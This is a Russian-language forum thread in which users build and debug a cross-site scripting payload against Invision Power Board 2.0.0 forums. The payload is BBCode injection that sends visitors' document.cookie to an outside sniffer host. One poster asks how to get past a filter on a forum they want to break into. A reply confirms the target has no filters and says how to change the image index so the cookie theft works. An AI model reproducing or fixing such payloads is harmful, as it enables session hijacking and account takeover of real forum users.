Code: <div class="postcolor" style='padding:4px;'><span style='color:<img src='http://aaaaa/=`aaajpg' border='0' alt='user posted image' />'>` style=background:url(javascript:document.images[68].src="[url]http://*******/sniff.jpg?"+document.cookie[/url]); </span></div> Это получается поле вставки скрипта Code: [COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[68].src="http://*******/sniff.pg?"+document.cookie); [/COLOR] перед style появляется />' Как можно это обойти?
Invision Power Board 2.0.0 Code: <div class="signature" style="padding: 5px;"> <span style='color:#aaaaaa <iМg src='http://aaaaa/=`aaajpg' border='0' alt='user posted image' />'>`style=background:url(javascript:document.images [68].src="http://armadaplus.com/css/show.gif?"+document.cookie);</sрan></div> Это получается после присвоения цвета. Т.е получается так, что подпись не отображается, по идее должен работать скрипт. Но опять появлятеся />
это потому что у тебя опера, а опера не видит знак `. то есть в эксплорере это подействует, а в опере - нет =) вот и всё =)
Чушь мелишь ссылку давай. Если у тебя в теле сообщения не работает, (Хотя чисто глядя на html который ты дал всё работает) то фильтры стоят.
Ну вот Я всё проверил, судя по тому коду который ты тут дал на форуме, он теги в подписи кроме картинки отключил. Откуда Я знаю что он теги в подписи отключил? Ну потому что Я прочитал твой html код который ты сам и дал!!!! Так что год, врать не умеет. =))) Теперь, ты мне в приват прислал ссылку на тот форум который ты хотел взломать. Ну так вот, Я там всё проверил, и в подписи и в сообщении фильров нету там всё работает. У тебя снифф не работал потому что у тебя 68 в коде. Это Админы в статье специально зделали чтобы Ламеры (В этом случае к сожалению как ты, но только не обижайся=) ) не ломали форумы. =)))))) Так что поменяй на 1. =))))